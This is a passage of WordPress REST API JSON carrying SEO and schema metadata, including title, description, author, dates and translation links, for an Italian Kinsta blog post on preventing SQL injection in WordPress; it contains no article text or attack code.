WordPress\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/kinsta.com\/it\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sviluppo di WordPress\",\"item\":\"https:\/\/kinsta.com\/it\/argomenti\/sviluppo-wordpress\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"SQL Injection: guida dettagliata per gli utenti di WordPress\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kinsta.com\/it\/#website\",\"url\":\"https:\/\/kinsta.com\/it\/\",\"name\":\"Kinsta\u00ae\",\"description\":\"Soluzioni di hosting premium, veloci e sicure\",\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kinsta.com\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kinsta.com\/it\/#organization\",\"name\":\"Kinsta\",\"url\":\"https:\/\/kinsta.com\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/kinsta.com\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2023\/12\/kinsta-logo.jpeg\",\"contentUrl\":\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2023\/12\/kinsta-logo.jpeg\",\"width\":500,\"height\":500,\"caption\":\"Kinsta\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/kinstaitalia\/\",\"https:\/\/x.com\/Kinsta_IT\",\"https:\/\/www.instagram.com\/kinstahosting\/\",\"https:\/\/www.linkedin.com\/company\/kinsta\/\",\"https:\/\/www.pinterest.com\/kinstahosting\/\",\"https:\/\/www.youtube.com\/c\/Kinsta\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kinsta.com\/it\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\",\"name\":\"Shaumik Daityari\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/kinsta.com\/it\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"caption\":\"Shaumik Daityari\"},\"description\":\"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!\",\"url\":\"https:\/\/kinsta.com\/it\/blog\/author\/shaumikdaityari\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"SQL Injection: guida dettagliata per gli utenti di WordPress - Kinsta\u00ae","description":"Scopri cos'\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/","og_locale":"it_IT","og_type":"article","og_title":"SQL Injection: guida dettagliata per gli utenti di WordPress","og_description":"Scopri cos'\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.","og_url":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/","og_site_name":"Kinsta\u00ae","article_publisher":"https:\/\/www.facebook.com\/kinstaitalia\/","article_published_time":"2023-10-17T01:07:03+00:00","article_modified_time":"2023-10-23T10:17:41+00:00","og_image":[{"width":1460,"height":730,"url":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg","type":"image\/jpeg"}],"author":"Shaumik Daityari","twitter_card":"summary_large_image","twitter_description":"Scopri cos'\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.","twitter_image":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg","twitter_creator":"@Kinsta_IT","twitter_site":"@Kinsta_IT","twitter_misc":{"Scritto da":"Shaumik Daityari","Tempo di lettura stimato":"13 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#article","isPartOf":{"@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/"},"author":{"name":"Shaumik Daityari","@id":"https:\/\/kinsta.com\/it\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036"},"headline":"SQL Injection: guida dettagliata per gli utenti di WordPress","datePublished":"2023-10-17T01:07:03+00:00","dateModified":"2023-10-23T10:17:41+00:00","mainEntityOfPage":{"@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/"},"wordCount":2549,"commentCount":0,"publisher":{"@id":"https:\/\/kinsta.com\/it\/#organization"},"image":{"@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg","keywords":["sicurezza web","wordpresshack"],"articleSection":["Sicurezza di WordPress"],"inLanguage":"it-IT","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kinsta.com\/it\/blog\/sql-injection\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/","url":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/","name":"SQL Injection: guida dettagliata per gli utenti di WordPress - Kinsta\u00ae","isPartOf":{"@id":"https:\/\/kinsta.com\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage"},"image":{"@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg","datePublished":"2023-10-17T01:07:03+00:00","dateModified":"2023-10-23T10:17:41+00:00","description":"Scopri cos'\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.","breadcrumb":{"@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kinsta.com\/it\/blog\/sql-injection\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage","url":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg","contentUrl":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg","width":1460,"height":730,"caption":"SQL Injection: Una Guida Introduttiva per gli Utenti di WordPress"},{"@type":"BreadcrumbList","@id":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/kinsta.com\/it\/"},{"@type":"ListItem","position":2,"name":"Sviluppo di WordPress","item":"https:\/\/kinsta.com\/it\/argomenti\/sviluppo-wordpress\/"},{"@type":"ListItem","position":3,"name":"SQL Injection: guida dettagliata per gli utenti di WordPress"}]},{"@type":"WebSite","@id":"https:\/\/kinsta.com\/it\/#website","url":"https:\/\/kinsta.com\/it\/","name":"Kinsta\u00ae","description":"Soluzioni di hosting premium, veloci e sicure","publisher":{"@id":"https:\/\/kinsta.com\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kinsta.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/kinsta.com\/it\/#organization","name":"Kinsta","url":"https:\/\/kinsta.com\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/kinsta.com\/it\/#\/schema\/logo\/image\/","url":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2023\/12\/kinsta-logo.jpeg","contentUrl":"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2023\/12\/kinsta-logo.jpeg","width":500,"height":500,"caption":"Kinsta"},"image":{"@id":"https:\/\/kinsta.com\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/kinstaitalia\/","https:\/\/x.com\/Kinsta_IT","https:\/\/www.instagram.com\/kinstahosting\/","https:\/\/www.linkedin.com\/company\/kinsta\/","https:\/\/www.pinterest.com\/kinstahosting\/","https:\/\/www.youtube.com\/c\/Kinsta"]},{"@type":"Person","@id":"https:\/\/kinsta.com\/it\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036","name":"Shaumik Daityari","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/kinsta.com\/it\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","caption":"Shaumik Daityari"},"description":"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!","url":"https:\/\/kinsta.com\/it\/blog\/author\/shaumikdaityari\/"}]}},"acf":[],"_links":{"self":[{"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/posts\/31805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/comments?post=31805"}],"version-history":[{"count":10,"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/posts\/31805\/revisions"}],"predecessor-version":[{"id":74054,"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/posts\/31805\/revisions\/74054"}],"alternate":[{"embeddable":true,"hreflang":"en","title":"English","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/en"},{"embeddable":true,"hreflang":"fr","title":"French","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/fr"},{"embeddable":true,"hreflang":"es","title":"Spanish","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/es"},{"embeddable":true,"hreflang":"pt","title":"Portuguese","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/pt"},{"embeddable":true,"hreflang":"it","title":"Italian","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/it"},{"embeddable":true,"hreflang":"da","title":"Danish","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/dk"},{"embeddable":true,"hreflang":"nl","title":"Dutch","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/nl"},{"embeddable":true,"hreflang":"de","title":"German","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/de"},{"embeddable":true,"hreflang":"sv","title":"Swedish","href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/translations\/se"},{"href":"https:\/\/kinsta.com\/it\/wp-json\/kinsta\/v1\/posts\/31805\/tree"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/media\/31808"}],"wp:attachment":[{"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/media?parent=31805"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/tags?post=31805"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/kinsta.com\/it\/wp-json\/wp\/v2\/topic?post=31805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}